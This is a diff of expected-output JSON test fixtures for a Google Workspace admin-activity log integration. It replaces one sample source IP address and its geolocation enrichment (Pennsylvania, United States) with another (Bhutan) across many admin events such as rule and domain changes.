@@ -3507,26 +3247,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 28139, + "log.offset": 28074, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3547,7 +3283,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3560,26 +3296,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 28610, + "log.offset": 28544, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3600,7 +3332,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3613,26 +3345,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 29026, + "log.offset": 28959, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3653,7 +3381,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3667,26 +3395,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 29457, + "log.offset": 29389, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3707,7 +3431,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3720,26 +3444,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 29921, + "log.offset": 29852, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3760,7 +3480,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3772,26 +3492,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 30330, + "log.offset": 30260, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3812,7 +3528,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -3824,26 +3540,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 30703, + "log.offset": 30632, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3864,7 +3576,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3876,26 +3588,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 31067, + "log.offset": 30995, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3916,7 +3624,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -3928,26 +3636,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 31440, + "log.offset": 31367, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3968,7 +3672,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3981,26 +3685,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 31804, + "log.offset": 31730, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4021,7 +3721,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -4035,26 +3735,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 32202, + "log.offset": 32127, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4075,7 +3771,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -4088,26 +3784,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 32644, + "log.offset": 32568, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -4128,7 +3820,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -4141,26 +3833,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 33082, + "log.offset": 33005, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
